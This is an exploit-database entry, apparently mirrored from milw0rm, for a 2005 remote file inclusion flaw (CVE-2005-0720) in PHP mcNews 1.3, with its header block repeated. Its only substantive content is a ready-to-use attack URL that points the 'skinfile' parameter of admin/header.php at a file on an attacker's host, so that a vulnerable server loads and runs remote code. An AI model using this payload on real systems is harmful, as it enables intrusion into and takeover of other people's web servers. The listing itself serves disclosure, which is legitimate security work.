PHP mcNews 1.3 - 'skinfile' Remote File Inclusion
| EKU-ID: 8997 | CVE: OSVDB-14601;CVE-2005-0720 | OSVDB-ID: |
| Author: Filip Groszynski | Published: 2005-03-07 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 8997 | CVE: OSVDB-14601;CVE-2005-0720 | OSVDB-ID: |
| Author: Filip Groszynski | Published: 2005-03-07 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
Example: if register_globals=on and allow_url_fopen=on: http://[victim]/[dir]/mcNews/admin/header.php?skinfile=http://[hacker_box]/ # milw0rm.com [2005-03-07]